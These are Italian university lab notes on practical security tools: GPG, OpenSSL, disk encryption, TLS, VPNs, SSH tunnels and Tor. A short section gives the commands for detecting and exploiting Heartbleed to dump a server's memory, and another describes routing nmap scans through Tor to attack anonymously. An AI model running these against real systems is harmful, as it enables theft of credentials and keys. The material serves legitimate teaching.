---
title: "Riassunto della parte di laboratorio di sec"
subject: "Riassunto della parte di laboratorio di sec"
author: Lorenzo Tullini, Federico Marchetti
lang: it
---

[TOC]

# GPG

GPG è un'implementazione alternativa open source di PGP (è derivato dalla sua versione open). Permette di cifrare e firmare dati e comunicazioni. Com­prende anche un sistema per la gestione delle chiavi. GPG è interoperabile con altre implementazioni (open o meno) di PGP.

Permette di manipolare le chiavi con:

```bash
# genera una nuova chiave in ~/.gnupg
gpg --gen-key
# rimuove la chiave privata
gpg --delete-secret -keys <nome>
# rimuove la chiave pubblica
gpg --delete-keys <nome>

# elencare tutte le chiavi con le relative caratteristiche l'id è
# un numero esadecimale simile a C559BE2CE9882A8A
gpg --list-keys [key-id]
gpg --keyid-format LONG --list-keys [key-id]
```

Il comando chiede alcune informazioni tra cui nome ed un identificativo (l'email) usato per la chiave. Viene inoltre chiesta una passphrase che viene utilizzata come chiave per cifrare la chiave privata in modo da preservarne la riservatezza. Le chiavi così generate hanno una data di scadenza, utile per evitare che un utente la generi e se ne dimentichi. La durata deve essere sufficientemente lunga per evitare di crearne una nuova costantemente, ma non tanto lunga da comprometterne le caratteristiche di sicurezza. Alla scadenza la chiave non viene eliminata ma viene richiesto eventualmente di rinnovarne la durata. Le chiavi vengono salvate all'interno della directory nascosta `~/.gnupg`.

Le chiavi possono essere anche importate o esportate

```bash
# importare una chiave
gpg --import
gpg --import <file>

# esportare la chiave privata:
# --output					se omesso stampa su stdout
# --armor 					output con caratteri stampabili
# --export-options			opzioni per l'esportazione (vedi man gpg)	
# --export 					esporta la chiave indicata o tutte le chiavi
#							se non viene indicato nulla
gpg --output <file-name> --armor --export-secret-key <key-id>
gpg --output <file-name> --armor --export-options export-backup \
	--export-secret-key <key-id>

# esportare la chiave pubblica
gpg --output <file-name> --armor --export <key-id>
```

Esportare la chiave privata è sempre un'operazione pericolosa, in quanto più copie della chiave esistono maggiore è la probabilità che una di queste venga diffusa. L'esportazione però può essere utile nel caso in cui si voglia farne un backup. Molto più comune è esportare la chiave pubblica, ad esempio per darla a qualcuno affinché possa usarla. È anche possibile caricare le proprie chiavi pubbliche su dei server appositi in modo che altri possano trovarle. Le chiavi su questi server non sono verificate, perciò non c'è mai una certezza matematica riguardo all'autenticità.

```bash
gpg --keyserver <server-name> --send-keys <key-id>
gpg --keyserver <server-name> --recv-keys <key-id>
```

Con le chiavi è possibile cifrare, decifrare e firmare dei documenti. Durante la firma è possibile usare o l'identità di default oppure specificare un'identità da usare solamente per firmare i dati. All'interno di un file cifrato è contenuto l'identificatore dell'identità usata per la cifratura e per la firma, quindi non è necessario specificare alcuna identità per decifrare.

```bash
# cifrare un file. È possibile ripetere l'opzione -r per 
# cifrare con più chiavi. Il file risultante contiene il 
# contenuto cifrato con tutte le chiavi
gpg --encrypt --armor -r <dest-key-id> <file-da-cifrare>
# cifrare e firmare un file
gpg --encrypt --sign --armor -r <dest-key-id> <file-da-cifrare-firmare>
# cifrare e firmare un file con un'id diverso da quello di default
gpg --encrypt --sign --armor -r <dest-key-id> \
	--local-user <sign-key-id> <file-da-cifrare-firmare>
# decifrare
# nota: il file di output va all'inizio dell'elenco dei parametri
gpg --decrypt <file-da-decifrare>
gpg --output <file-out> --decrypt <file-da-decifrare>
```

È possibile anche solamente firmare un file senza però cifrarlo, in modo da garantire solo l'autenticità.

 ```bash
 # per firmare un file
 gpg --detach-sign -o sig.gpg inputdata.txt
 # per verificare un file
 gpg --verify sig.gpg inputdata.txt
 
 # nel caso di file di testo ASCII si può usare anche
 # --clearsign
 # per firmare il file
 gpg --clearsign -o output.txt inputdata.txt
 # per verificare la firma
 gpg --verify output.txt
 # per verificare la firma e  il file originale
 gpg --decrypt output.txt
 ```



Infine è possibile firmare la chiave pubblica di qualcuno

```bash
gpg --sign-key <key-id>
```

È possibile impostare l'identità di default per firmare i dati aggiungendo all'interno di `~/.gnupg/gpg.conf` la riga

```
default-key <key-id>
```



# OpenSSL

OpenSSL è una libreria C che implementa le principali operazioni crittografiche come crittografia sim­metrica, crittografia asimmetrica, firma digitale, funzioni hash e così via... OpenSSL implementa anche il protocollo SSL ed è disponibile per un'ampia varietà di piattaforme.

Il comando `openssl` è strutturato mediante un insieme di sottocomandi, tra cui i principali sono:

* `ca` per creare una certification authority
* `dgst` per calcolare funzioni hash
* `enc` per cifrare e decifrare dati
* `genrsa` per generare una coppia di chiavi per l'algoritmo RSA
* `rsa` per la gestione di RSA
* `rsautl` per cifrare, decifrare, firmare e verificare firme con RSA
* `verify` per effettuare controlli su certificati X509
* `x509` per la gestione di certificati X509
* `password` per la generazione di “hashed password”
* `pkcs7` per gestire le informazioni secondo lo stan­dard PKCS#7
* `rand` per la generazione di stringhe di bit pseudo­casuali

Il manuale in linea di OpenSSL ha più pagine, una generale (`man openssl`) ed una per ogni sottocomando (es. `man openssl-enc`, `openssl-dgst`).

## Crittografia simmetrica

OpenSSL supporta vari algoritmi di cifratura

```bash
# per elencare tutti gli algoritmi di cifratura supportati
openssl enc --ciphers

# per convertire in base64 un file, l'output va su stdout
# -out		redirige l'output su file
openssl enc -base64 -in <file>
# per convertire da base64 un file, l'output va su stdout
# -out		redirige l'output su file
openssl enc -d -base64 -in <file_base_64>

# cifra un file tramite una password
# -aes-256-cbc			usa aes256 in modalità cbc
# -md 					algoritmo da usare per creare la chiave dalla pwd
#						Alcuni valori possibili sono sha256, sha512, md5
# -pbkdf2				funzione per derivare la chiave dalla pwd
# -iter					numero di iterazioni per derivare la chiave
# -salt					aggiungi un salt casuale. Con -S <salt> si può
#						specificare un valore manuale
# -in 					file da cifrare
# -out 					file di output
openssl enc -aes-256-cbc -md <alg> -pbkdf2 -iter <n> \
	-salt -in <file_chiaro> -out <file_cifrato>

# decifra un file usando le stesse impostazioni usate per cifrarlo
# -d					decifra
openssl enc -d -aes-256-cbc -md <alg> -pbkdf2 -iter <n> \
	-salt -in <file_cifrato>
```



## Crittografia asimmetrica

Possiamo anche usare Openssl per gestire chiavi RSA

```bash
# per generare una chiave privata
openssl genrsa -out chiave.pem 2048
# mostra il contenuto della chiave in forma testuale
openssl rsa -in chiave.pem -text -noout

# per cifrare la chiave privata con aes e passphrase. 
# Se la pwd è troppo corta il comando termina con un errore
openssl rsa -in chiave.pem -aes-256-cbc -out enc_chiave.pem
# per decifrare la chiave precedentemente cifrata
openssl rsa -in enc_chiave.pem -out chiave.pem
```

Il file `chiave.pem` contiene tutti i dati necessari alla chiave privata, tra cui la chiave privata stessa, il modulo $n$, i valori e (di default pari a 65537) $e$ $d$, i due numeri primi $p$ e $q$. Contiene al suo interno anche la chiave pubblica, che per essere distribuita deve essere estratta dal file.

```bash
# per estrarre la chiave pubblica a partire dalla chiave privata
openssl rsa -in chiave.pem -pubout -out chiave_pub.pem

# per cifrare un file con la chiave pubblica contenuta all'interno
# di chiave.pem che contiene entrambe le chiavi
# -encrypt 		cifra i dati con la chiave pubblica
# -inkey 		file contenente la chiave
openssl rsautl -encrypt -in testo.txt -inkey chiave.pem \
	-out cifrato_rsa.bin
# per cifrare direttamente con la chiave pubblica
# -pubin 		specifica che il file passato ad inkey contiene solo
#				la chiave pubblica
openssl rsautl -encrypt -in testo.txt -inkey chiave_pub.pem \
	-pubin -out cifrato_rsa.bin
# per decifrare
openssl rsautl -decrypt -in cifrato_rsa.bin -inkey chiave.pem \
	-out out.txt
```

Le chiavi appena generate possono essere usate anche per firmare o verificare delle firme. Per ottenere la lista degli algoritmi di hash supportati lanciare `openssl list -digest-commands`.

```bash
# per prima cosa occorre calcolare il digest del file da firmare
openssl dgst -md5 -out digestfile file.txt
# poi è possibile firmarlo
openssl rsautl -sign -in digestfile -out digest_firmato \
	-inkey chiave.pem
# infine è possibile verificare la firma effettuata per ottenere
# nel file di output il digest originale
openssl rsautl -verify -in digest_firmato -out digest_verifica \
	-inkey chiave.pem
# per confrontare il digest ottenuto direttamente dal file e quello
# dall'operazione di verfica
diff digestfile digest_verifica

# In alternativa si possono eseguire i passaggi tutti assieme
# Per firmare il file (genera l'hash e lo firma)
openssl dgst -md5 -sign chiave.pem -out digest_firmato file.txt
# Per verificare il digest firmato relativo a file.txt
openssl dgst -md5 -verify chiave_pub.pem -signature digest_firmato file.txt
```



## Public Key Infrastructure

Permette di gestire una PKI generando e firmando certificati.

Il file di configurazione di `openssl` si trova all'interno di `/usr/lib/ssl/openssl.cnf` (vedi sezione `[ca]` e `[CA_default]`).

per gestire manualmente le operazioni invece si può usare:

```bash
# per generare la coppia di chiavi alla base della CA (come prima)
openssl genrsa -out rootCA.key 2048
# per richiedere un certficato basato su una coppia di chiavi
# -x509				crea un certificato autofirmato
# -new				genera un nuovo certificato
# -days 			specifica la durata
openssl req -x509 -new -key rootCA.key -days 3650 -out rootCA.pem

# a volte può essere utile cambiare il formato del certificato per poterlo
# includere all'interno dei browser
openssl x509 -in rootCA.pem -outform DER -out cacert.der

# per mostrare il contenuto del certificato
openssl x509 -in rootCA.pem -text -noout
# per mostrare la scadenza di un certificato
openssl x509 -in rootCA.pem -dates -noout
```

Una volta generato il certificato della CA gli utenti possono effettuare richieste per poter ottenere un certificato firmato

```bash
# generare la chiave per un client
openssl genrsa -out client1.key 2048
# effettuare la richiesta di firma (CSR)
openssl req -new -key client1.key -out client1.csr
# per mostrare il contenuto della csr
openssl req -in client1.csr -text -noout

# per firmare la CSR del client
# -req 				openssl si aspetta una csr in input, se omesso il
# 					il certificato è autofirmato
# -CA				certificato da usare per la firma
# -CAkey			specifica la chiave privata per firmare la csr
# -CAcreateserial	genera il seriale per il certfiicato, se l'opzione
#					è omessa viene usato un valore casuale
openssl x509 -req -days 365 -CA rootCA.pem -CAkey rootCA.key \
	-CAcreateserial -CAserial serial -in client1.csr -out client1.pem
```

Infine è possibile verificare la validità di un certificato possedendo il certificato della CA. Affinché la verifica vada a buon fine i due certificati devono avere CN diversi, sennò sembrano autofirmati.

```bash
# verifica il certificato
openssl verify -verbose -CAfile rootCA.pem client1.pem
```

# Cifratura

## Cifratura cartelle

Esercitazione in stile tutorial, contiene un elenco di comandi da lanciare per ottenere il risultato desiderato, ovvero cifrare una cartella ed il filesystem di un utente.

```bash
# per identificare il fs su cui lavorare. Elenca una serie di
# dispositivi in /dev/*
sudo fdisk -l
# da ora in poi il dispositivo prescelto è contenuto in $DEVICE
```
Perché la crittografia sia supportata dal filesystem è necessario che i valori ottenuti con i due comandi sotto coincidano. `getconf` visualizza le variabili di configurazione passate come parametro. `tune2fs` permette di modificare il valore di alcune variabili associate al filesystem

```bash
# stampa la dimensione delle pagine
getconf PAGE_SIZE								# 4096
# ottieni i dati relativi al superblocco di $DEVICE
sudo tune2fs -l $DEVICE | grep 'Block Size'		# 4096
```

Se i valori coincidono si può procedere ed abilitare la crittografia sul dispositivo

```bash
# imposta la cifratura
# -O encrypt 		imposta la feature encrypt per il dispositivo
sudo tune2fs -O encrypt $DEVICE
```

Occorre modificare la configurazione di PAM per permettere le operazioni. Si deve creare quindi il file `/usr/share/pam-configs/keyinit-fix` ed inserirci

```yaml
Name: keyinit fix
Default: yes 				# Policy di default
Priority: 0
Session-Type: Additional
Session:
	optional pam_keyinit.so force revok
```

Poi occorre riconfigurare PAM affinché usi `fscrypt`

```bash
sudo pam-auth-update
```

A questo punto è possibile cifrare una cartella.

```bash
# effettua il setup di fscrypt
sudo fscrypt setup
# effettua il setup per la partizione di root
sudo fscrypt setup /
```

A questo punto il setup è completo e si può usare `fscrypt` per cifrare le cartelle

```bash
# supponendo di oler cifrare la cartella encrypted
# è possibile cifrare solamente cartelle vuote
fscrypt encrypt encrypted

# per visualizzare i metadati della cartella
fscrypt status encrypted

# è poi possibile bloccare e sbloccare la cartella
fscrypt lock encrypted			# nella VM non funziona per
								# qualche motivo, ma la documentazione
								# dice che è possibile
fscrypt unlock encrypted

# è poi possibile cambiare la password usata per autenticarsi
# --protector=/:749f90f5f9ff7d42
#             ^        ^
#         mnt point   protector id
# il mnt point è quello specificato durante il setup
# il protector id si trova con il comando status
fscrypt metadata change-passphrase --protector=/:749f90f5f9ff7d42
```

## Cifratura home directory

Per cifrare la home directory di un utente si può adottare lo stesso principio descritto sopra. Dato che possono essere cifrate solamente le cartelle vuote, in via preliminare, occorre spostare il contenuto della home in un'altra directory.

```bash
# si assuma USERNAME=otheruser
# creazione della nuova cartella home
sudo mv /home/$USERNAME /home/$USERNAME.bak
sudo mkdir /home/$USERNAME
chown $USERNAME:$USERNAME /home/$USERNAME
# cifratura della cartella come sopra. Per far funzionare tutto in
# maniera trasparente è opportuno selezionare il login come
# metodo di autenticazione
fscrypt encrypt /home/$USERNAME --user=$USERNAME
# per copiare i dati, ma va bene anche cp
rsync -avH --info=progress2 --info=name0 /home/$USERNAME.bak /home/$USERNAME
# rimozione della copia della home
rm -rf /home/$USERNAME.bak
```

## Cifratura di un disco/partizione

Per poter effettuare questa operazione è necessario il tool `cryptsetup`. Una volta individuata la partizione prescelta tramite il comando `fdisk -l` (`/dev/sdb1` in questo caso) occorre formattarla con il formato LUKS.

```bash
# formattare la partizione /dev/sdb1 in formato LUKS
sudo cryptsetup luksFormat /dev/sdb1
# per aprire la partizione assegnando il nome
sudo cryptsetup luksOpen /dev/sdb1 crittata
```

La partizione così creata è visibile come device mapper in `/dev/mapper`. È ora possibile creare il filesystem all'interno della partizione

```bash
# per creare il filesystem
# -L 				etichetta del volume, visualizzabile con blkid
sudo mkfs.ext4 /dev/mapper/crittata -L crittata
# per montare la partizione in /tmp/crit
mkdir /tmp/crit		# creo il pt di mount
sudo mount /dev/mapper/crittata /tmp/crit
```

A questo punto è possibile navigare il contenuto della partizione liberamente in `/tmp/crit`. La cartella `/tmp/crit` è però di proprietà di `root`, quindi affinché un utente normale possa godere dei vantaggi offerti sarà necessario creare una cartella di proprietà di quell'utente all'interno di `/tmp/crit`. Una volta finito di lavorare con la partizione è sufficiente smontarla e chiudere la partizione

```bash
# per smontare la partizione
sudo umount /tmp/crit
# per chiudere la partizione
sudo cryptsetup luksClose crittata
```

# TLS

Per permettere ad un sito di utilizzare HTTPS bisogna che questo sia fornito di una coppia di chiavi pubblica e privata e di un certificato per la chiave pubblica, una possibilità è rivolgersi ad una CA. Un'altra possibilità più sbrigativa, ma non accettata dai broswer, che chiederanno sempre autorizzazione se fidarsi o meno all'utente, è il certificato autofirmato. Con openssl è possibile generare tutto il necessario in un solo comando:

```bash
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
	-keyout /etc/ssl/private/<nome_chiave_pub>.key \
	-out /etc/ssl/certs/<nome_certificato>.crt
```
A questo punto occorre caricare i file che si trovano nell'archivio `tls_file.tgz`.

Segue a ciò la generazione di un gruppo robusto DH che viene utilizzato per negoziare il Perfect Forward Secrecy con i client:

```bash
sudo openssl dhparam -out /etc/nginx/dhparam.pem 512
```
**ATTENZIONE:** 512 è un valore comodo perché permette di generare il gruppo DH velocemente ma non è assolutamente sicuro, servono almeno 2048 bit se non 4096.

A questo punto è possibile configurare il server web per funzionare con https, nel caso di NGINIX è sufficiente modificare il file `/etc/nginx/snippets/self-signed.conf` in particolare i campi:
```bash
ssl_certificate /etc/ssl/certs/<nome_certificato>.crt;
ssl_certificate_key /etc/ssl/private/<nome_chiave_pub>.key;
```
E' necessario in oltre riavviare NGINIX:
```bash
sudo nginx -t # il warning deve venire fuori perchè è un certificato autofirmato.
sudo systemctl restart nginx
```

Creato il sito e aggiunto a NGINIX è necessario registrare il dominio nel file `/etc/hosts`, in quanto è necessario che la macchina risolva un indirizzo per poter funzionare https. A questo punto la comunicazione cifrata e autentica https è stata configurata, ovviamente i broswer non si fidano di certificati autofirmati e chiederanno se bisogna fidarsi la prima volta che si accede al sito. 

## Attacco Heartbleed
Preparata una macchina con versione di SSL vulnerabile è possibile sfruttare l'attacco Heartbleed per fare il dumping di parte della memoria del server web. Nella memoria possono essere contenute credenziali di utenti e/o chiavi RSA, totali o parziali.
Con una funzionalità di `nmap` è possibile verificare se un servizio è vulnerabile:
```bash
nmap -p 443 --script ssl-heartbleed <ip_target>
```

L'exploit per Heartbleed è disponibile al seguente repository:
```
https://github.com/sensepost/heartbleed-poc.git
```
E' sufficiente clonarlo e saranno disponibili più exploit in diversi linguaggi, per utilizzare l'exploit Python è sufficiente:
```bash
python2 heartbleed-poc.py <dominio_target>
```

## Mosquitto

Una volta installato mosquitto e controllato che il server sia attivo

```bash
sudo apt install mosquitto-clients
sudo systemctl status mosquitto
```

A questo punto possiamo mettere un sub in ascolto per un evento `sensors` e lanciare un pub che pubblichi un dato

```bash
# sub in ascolto per eventi sensors su localhost
mosquitto_sub -h localhost -t sensors/#

# pub invia il valore 25
mosquitto_pub -t sensors/dht11/temperature -m 25

# mettendosi in scaolto sulla stessa rete si vede il payload in chiaro
tshark -i lo -Px

# 8 0.000588719 ::1 -> ::1 MQTT 117 Publish Message [sensors/dht11/temperature]
#
# 0000  00 00 00 00 00 00 00 00 00 00 00 00 86 dd 60 02   ..............`.
# 0010  b3 7c 00 3f 06 40 00 00 00 00 00 00 00 00 00 00   .|.?.@..........
# 0020  00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00   ................
# 0030  00 00 00 00 00 01 b9 ea 07 5b 9e 14 37 da 9a 9d   .........[..7...
# 0040  e0 22 80 18 02 00 00 47 00 00 01 01 08 0a 59 57   .".....G......YW
# 0050  3b 7f 59 57 3b 7e 30 1d 00 19 73 65 6e 73 6f 72   ;.YW;~0...sensor
# 0060  73 2f 64 68 74 31 31 2f 74 65 6d 70 65 72 61 74   s/dht11/temperat
# 0070  75 72 65 32 35                                    ure25
```

Per far sì che MQTT usi TLS per proteggere il traffico occorre:

* generare un certificato per la CA (`rootCA.crt`) ed inserirlo all'interno di `/etc/mosquitto/certs/`
* generare una coppia di chiavi ed certificato per il broker (`broker.crt` e `broker.key`) ed inserirli all'interno di `/etc/mosquitto/certs/`
* generare una coppia di chiavi ed certificato per ogni client che deve interagire con il broker

**ATTENZIONE:** per i certificati di broker e client bisogna mettere come CN del certificato l'indirizzo dell'host su cui risiedono, nel caso in cui siano tutti sulla stessa macchina `localhost` va bene per tutti.

Poi bisogna modificare la configurazione di mosquitto

```bash
# /etc/mosquitto/mosquitto.conf

# porta standard per MQTTs
port 8883
# certificato della CA 
cafile /etc/mosquitto/certs/rootCA.crt
# certificato e chiave del broker (server) 
certfile /etc/mosquitto/certs/broker.crt
keyfile /etc/mosquitto/certs/broker.key

require_certificate true
```

e riavviare il demone di mosquitto 

```bash
sudo systemctl restart mosquitto
```

La rete è ora funzionante e si possono connettere i client

```bash
# sub
# -t 			topic
# -p			porta del broker
# --cafile		file che contiene il certificato della CA
# --cert		certificato del client
# --key 		chiave associata al certificato del client
# -h 			host su cui risiede il broker
mosquitto_sub  -t sensors/\# -p 8883 -h localhost \
	--cafile /etc/mosquitto/certs/rootCA.crt \
	--cert client1.crt --key client1.key 

# pub
# -m messaggio
mosquitto_pub -t sensors/dht11/temperature -m 25 -p 8883 -h localhost \
	--cafile /etc/mosquitto/certs/rootCA.crt 
	--cert client2.crt --key client2.key
```

# VPN

## Comandi per l'amministrazione delle reti

Di seguito un po' di comandi utili per amministrare le reti, si rivelano particolarmente utili nella configurazione delle VPN.
```bash
# mostra l'hostname della macchina
hostname
# mostra le configurazioni di tutte le interfacce
ip a
# mostra le tabelle di instradamento
ip r 
# aggiunge una nuova regola di instradamento
sudo ip r add <subnet_da_raggiungere> via <ip_gateway> 
sudo ip r add <indirizzo/subnet> via dev <nic>
```
Se una macchina deve funzionare da gateway è necessario
```bash
echo "1" > /proc/sys/net/ipv4/ip_forward
```
Pre rendere permanente la modifica anche dopo il riavvio:
```bash
# /etc/sysctl.conf
net.ipv4.ip_forward = 1
```

Per monitorare la rete da terminale è possibile usare `tshark`, che è la versione CLI di wireshark

```bash
# mostra le interfacce disponibili per la cattura
thsark -D
# -f 			filtra. Con il filtro inserito non viene mostrato 
# 				il traffico sulla porta 22 (SSH), per pulire l'output
# -i			interfaccia di rete (anche any)
# -P			riassunto delle caratteristiche del pacchetto
# -x 			dump esadecimale e ASCII del contenuto
# -w 			salva il traffico in formato pcap
# -c			numero massimo di pacchetti da ispezionare
tshark -f "not port 22" -i <nic> -w <dump-file> -c <num> -Px
# lettura dump
# -r 			file contenente i pacchetti
# -P			riassunto delle caratteristiche del pacchetto
# -x 			dump esadecimale e ASCII del contenuto
# -Y			filtra i pacchetti, applica filtri "display"
tshark -r <dump> -Px -Y http -Y ip.src

# esempi filtri da usare durante la cattura 
# o la visualizzazione dei dump
#
# ip.addr == 192.168.10.1 
# ip.addr != 192.168.10.1 
# eth.addr == 01:23:45:67:89:ab && tcp.port == 25
# http.response.code == 404 && ip.addr == 192.168.10.1 
```

## Struttura della rete

La rete ha la seguente struttura

![image-20210603114133724](/home/federico/Documenti/Università/materiale_corsi/riassunti_unibo/Laboratorio di Sicurezza Informatica/laboratorio/images/vpn_rete.png)

## IPsec

Di seguito il file di configurazione di un tunnel IPSec, il file deve essere salvato in `/etc/ipsec.conf`

```bash
# /etc/ipsec.conf

config setup

conn vpn1 # nome della vpn
  authby=secret # metodo di autenticazione, in questo caso pre shared key memorizzata di default in /etc/ipsec.secret
  auto=start # avvio automatico con il boot del sistema
  compress=no # compressione dei dati in transito
  pfs=yes
  type=tunnel # tipo di vpn
  left=192.168.56.11 # ip lato locale
  leftsubnet=10.1.1.0/24 # subnet vpn lato locale
  right=192.168.56.22 # ip lato remoto  
  rightsubnet=10.2.2.0/24 # subnet vpn lato remoto

include /var/lib/strongswan/ipsec.conf.inc
```

```bash
# /etc/ipsec.secret

<ip_locale> <ip_remoto> : PSK "password"
include /var/lib/strongswan/ipsec.secrets.inc
```
Una volta apportate le modifiche è sufficiente:
```bash
sudo ipsec stop
sudo systemctl restart ipsec.service
sudo systemctl status ipsec.service

sudo ipsec status # per vedere lo stato di ipsec
```
A questo punto il tunnel VPN è configurato, eventuali errori sono loggati in `/var/log/syslog`.
```bash
# permette di verdere le connessioni vpn attive su una macchina
sudo ip xfrm monitor 	
# permette di vedere le policy di ipsec
sudo ip xfrm policy 	
# permette di vedere lo stato dei tunnel
sudo ip xfrm state
```
### Configurazione Road Warrior

Modificare i file `/etc/ipsec.conf`

```bash
# road warrior
<...>
left=%defaultroute
right=192.168.56.22
rightsubnet=10.2.2.0/24
<...>

# server
<...>
left=%defaultroute    
leftsubnet=10.2.2.0/24    
right=%any
<...>
```

A questo punto è necessario modificare il file /etc/ipsec.secret per aggiungere le password ai canali VPN:
```bash
# Server
%defaultroute %any : PSK "password"

# Road Warrior
%defaultroute <ip_server_vpn> : PSK "password"
```

Occorre poi modificare la tabella di instradamento del road warrior con 

```bash
# instradamento per la rete 10.2.2.0/24 
sudo ip r add 10.2.2.0/24 via 192.168.56.22

# per renderlo permanente aggiungere in /etc/network/interfaces
# nelle configurazioni dell'interfaccia eth3
up ip r add 10.2.2.0/24 via 192.168.56.22
```

```bash
# ????????????????
# Aggiungere su host2 la rotta per tornare a 192.168.56.11
# gw1 sa come raggiungere la rete 10.2.2.0/24 per via 
# della configurazione di ipsec
sudo ip r add 192.168.56.11 via 10.2.2.254
```



## OpenVPN

OpenVPN riproduce con sw user space i concetti di transport e tunnel di IPSec.  Ha comunque la necessità di eseguire come root perchè deve abilitare le interfacce tap e tun e modificare le tabelle di routing.

E' importante ricordare che OpenVPN utilizza tutto lo stack di rete, dal livello applicativo al livello data link, e funziona con il paradigma client - server.

La modalità static key di OpenVPN è la più semplice, c'è un'unica chiave simmetrica. La chiave condivisa va prima di tutto creata:
```bash
cd /etc/openvpn
openvpn --genkey --secret static.key
chmod 600 /etc/openvpn/static.key
```
Va ora configurato il server OpenVPN:
```bash
# /etc/openvpn/server.conf

dev tun
local 192.168.56.22 # il locale del server
ifconfig 10.1.0.2 10.1.0.1 <indirizzo scheda di rete virtuale locale> <indirizzo scheda di rete virtuale remoto>
secret static.key
script-security 3
up ./route.up # deve essere correto se il comando ritorna errore openvpn non parte
verb 3
```
Di seguito la configurazione del client:
```bash
dev tun
remote 192.168.56.22 <indirizzo del server IN QUESTO CASO INDIRIZZO REMOVO !!!>
ifconfig 10.1.0.1 10.1.0.2 <indirizzo scheda di rete virtuale locale> <indirizzo scheda di rete virtuale remoto>
secret static.key
script-security 3
up ./route.up # deve essere correto se il comando ritorna errore openvpn non parte
verb 3
```

OpenVPN in altri scenari ha varie direttive per impostare automaticamente le rotte, per semplicità si usa una caratteristica più generale, che permette di eseguire uno script generico all'attivazione del tunnel. Per farlo si aggiunge il file '/etc/openvpn/route.up' con dentro:
```bash
#!/bin/bash

/usr/sbin/ip r add <subnet da raggiungere> via <gateway>
```
Per avviare il tunnel:
```bash
systemctl start openvpn
systemctl start openvpn@<nome_istanza> # per avviare una istanza specifica di OpenVPN
```

### Configurazione Road Warrior

Dopo aver copiato i file da `vpn_files` nelle corrette posizioni occorre installare `bridge_utils` e riavviare il demone di rete per far sì che la configurazione venga applicata.

A questo punto occorre impostare i certificati x509 per la comunicazione. La procedura è descritta nelle slide, ma in realtà tra i file forniti per l'esercitazione ci sono già tutti i certificati necessari.

```bash
sudo cp -r /usr/share/easy-rsa /etc/openvpn/
sudo chown -R $USER /etc/openvpn/easy-rsa/
```

Configurazione (parti essenziali) del server (GW2)

```bash
# /etc/openvpn/server.conf

mode server
port 1194
proto udp 

dev tap0
up "/etc/openvpn/up.sh br0"
down "/etc/openvpn/down.sh br0"
server-bridge 10.2.2.254 255.255.255.0 10.2.2.10 10.2.2.20
ca keys/ca.crt
cert keys/server1.crt
key keys/server1.key  # This file should be kept secret
dh keys/dh.pem
```

Configurazione (parti essenziali) del road warrior (GW1)

```bash
# /etc/openvpn/client.conf

client

dev tap   
remote 192.168.56.22 1194  
nobind  

ca keys/ca.crt  
cert keys/user1.crt  
key keys/user1.key
```

# SSH

SSH non solo permette di connettersi da remoto alla shell di una macchina, ma anche di fare tunnel che permettono di aggirare i firewall
```bash
ssh <nome_utente>@<ip_target> # permette di connettersi alla macchina remota
```
Nel caso si voglia accedere ad una macchina con più salti ssh, ovvero con una catena di macchine comunicanti via ssh è sufficiente:
```bash
ssh -J <usr1>@<ip_m1> <usr2>@<ip_m2> <usr3>@<ip_m3> # se gli utenti sono diversi
ssh -J <ip_m1>,<ip_m2> <ip_m3> # se gli utenti sono sempre lo stesso, ATTENZIONE BISOGNA FARE PRIMA LO SCAMBIO DELLA CHIAVE PUBBLICA DELL'HOST SU TUTTE LE MACCHINE !!!
```

## Tunnel SSH

Il tunnel permette di fare una redirezione, attraverso un canale SSH, quindi protetto da crittografia asimmetrica, del flusso di traffico destinato ad un certo ip ed a una certa porta.

### Local port forwarding

Un tunnel locale comporta che ogni richiesta a `ip-locale:porta-locale`  sia reindirizzata a `dest:porta-dest` attraverso la connessione a `ip-server-ssh:porta-server-ssh`
```bash
# lanciato dalla macchina locale
ssh -L [ip-locale:]<porta-locale>:<dest>:<porta-dest> \
	[user@]<ip-server-ssh> [-p <porta-server-ssh>]
```
Con questo comando, facendo una richiesta a `localhost:porta_locale` si ha lo stesso comportamento che si otterrebbe facendo una richiesta a `dest:porta-dest`.

### Remote port forwarding

Il tunnel remoto è leggermente più complesso. Gli elementi dell'interazione sono tre:

* `host`
* `gateway (macchina intermedia)`
* `target`

Il tunnel remoto comporta che il gateway apra una porta dal lato di connessione dell'host. Ogni richiesta a questa porta viene reindirizzata alla macchina target. Di fatto la macchina intermedia fa da proxy. Per prima cosa è necessario abilitare nel demone ssh della macchina intermedia la capacità di fare forwarding nel modo appena descritto. Per farlo è necessario editare:

```bash
sudo nano /etc/ssh/sshd_conifig
GatewayPorts yes # aggiungere questa riga

sudo systemctl restart sshd
```
A questo punto è possibile eseguire il tunnel remoto

```bash
# se il primo ip-gw viene omesso il server ssh si mette 
# in ascolto su tutte le interfacce e tutti gli indirizzi disponibili 
ssh -R [ip-gw:]<porta-gw-da-esporre>:<ip_target>:<porta_target> <ip-gw>
```
A questo punto fatta una richiesta a `ip-gw:porta-gw-da-esporre` si ottiene lo stesso effetto che facendo una richiesta a `ip_target:porta_target`.

### Dynamic port forwarding

È possibile creare un proxy socks a cui connettersi

```bash
ssh -D [ip-locale:]<porta-locale> [user@]<ip-server-ssh>
```

Questo comando crea una connessione con `ip-server-ssh`, ma crea anche un proxy socks su `ip-locale:prota-locale` attraverso cui far passare il traffico.

### Catena di host

```bash
ssh -J [user1@]<ip-ssh1>,[user2@]<ip-ssh2>... [user-dest@]<ip-ssh-dest>
```

# TOR

Oltre all'utilizzo mainstream di TOR attraverso il suo browser, l'utilizzo più interessante a un esperto di sicurezza, più nello specifico un pentester, è quello di utilizzarlo come proxy per l'intero sistema operativo, in modo da lanciare attacchi proteggendo l'anonimato il meglio possibile. Una volta installata la rete tor, nelle macchine di laboratorio c'è già, e possibile avviarla con:
```bash
sudo systemctl restart tor.service
```
In questo caso tornano molto utili gli socks proxy. Con socks5 è possibile reindirizzare qualsiasi protocollo di comunicazione. Per fare questo si usa il tool proxychains:
```bash
# /etc/proxychains.conf

strict_chain # se decommentato usa sempre la stessa serie di nodi TOR ad ogni connessione
random_chain # se decommentato cambia la sere di nodi TOR ad ogni connessione
proxy_dns # fa passare le richieste DNS anch'esse nel proxy

tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]

<tipo_proxy> <ip_proxy> <porta_proxy> (<user> <password> (opzionali)) # ad esempio socks5 192.168.1.49 1080
```
Per lanciare un programma che utilizza il proxy:
```bash
proxychains firefox
proxychains nmap -sT 10.0.0.0/24
```

#  iptables

Vedi pagine man:

* `man iptables`
* `man iptables-extensions`

Forma generale dei comandi:

```bash
# inserimento di una regola in una posizione specifica o all'inizion
sudo iptables [-t table] -I chain [rulenum] rule-specification
